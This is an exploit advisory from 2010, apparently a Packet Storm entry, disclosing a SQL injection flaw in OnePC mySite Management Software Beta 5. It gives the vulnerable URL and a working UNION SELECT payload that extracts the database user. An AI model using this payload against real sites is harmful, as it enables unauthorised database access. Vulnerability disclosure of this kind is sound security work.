OnePC mySite Management Software SQL Injection

2010-04-13T00:00:00
ID PACKETSTORM:88287
Type packetstorm
Reporter Valentin Hoebel
Modified 2010-04-13T00:00:00

Description

                                        
                                            `# Exploit Title: OnePC mySite Management Software SQL Injection Vulnerability  
# Date: 10.04.2010  
# Author: Valentin  
# Category: webapps/0day  
# Version:   
# Tested on:   
# CVE :   
# Code :   
  
  
  
:: General information  
:: OnePC mySite Management Software SQL Injection Vulnerability  
:: by Valentin Hoebel  
:: valentin@xenuser.org  
  
:: Product information  
:: Name = OnePC mySite Management Software  
:: Vendor = OnePC  
:: Vendor Website = http://www.onepc.net/  
:: Affected versions = Beta 5  
  
  
:: SQL Injection Vulnerability  
  
Vulnerable URL  
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX  
  
Exploit the vulnerability  
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--  
  
  
:: Additional information  
:: Vendor notified = 10.04.2010  
:: Advisory published = 11.04.2010  
Software seems not to be developed any further, not many websites are using it today.  
`